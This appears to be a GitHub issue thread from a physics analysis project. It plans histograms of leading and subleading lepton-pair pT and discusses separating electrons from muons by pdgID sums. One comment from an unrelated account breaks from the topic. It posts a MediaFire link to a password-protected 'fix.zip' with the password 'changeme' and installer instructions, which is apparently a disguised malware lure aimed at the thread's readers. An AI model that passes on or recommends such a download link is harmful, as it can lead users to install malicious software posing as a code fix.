### ISSUE TITLE
Add code for leading/ subleading lepton pT

### ISSUE THREAD

**Issue by rsamconn** [ujphys/4lMET_Ana#32]
**Histograms**
1. Leading pair pT
2. Subleading pair pT
3. Quadruplet pT

**Questions**
1. Where to implement in the code - in the particle check loop or in the bitmask check? The former requires only variables, the latter requires variables and histograms
2. Divide by electrons vs muons? Or just look at overall?
3. Do leading and subleading for every pair?
4. Do leading pair vs subleading pair? Is pair-pT just the sum of pT's of each lepton in the pair?
5. How do you compare events where one pair is muons and one pair is electrons?

**Code implentation**
_Simplest:_
- Ignore e/u distinction
- Only compare pairs (not individual leptons in a pair)
- Save pair pT as variables, then compare and fill leading/subleading histograms accordingly
_Separate e/u by sum of pdgIDs:_
- eeee -> 44 (or 22)
- uuuu -> 52 (or 26)
- eeuu -> 48 (or 24)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rsamconn** [comment]
Completed during invariant mass work.
See here https://github.com/ujphys/4lMET_Ana/pull/33
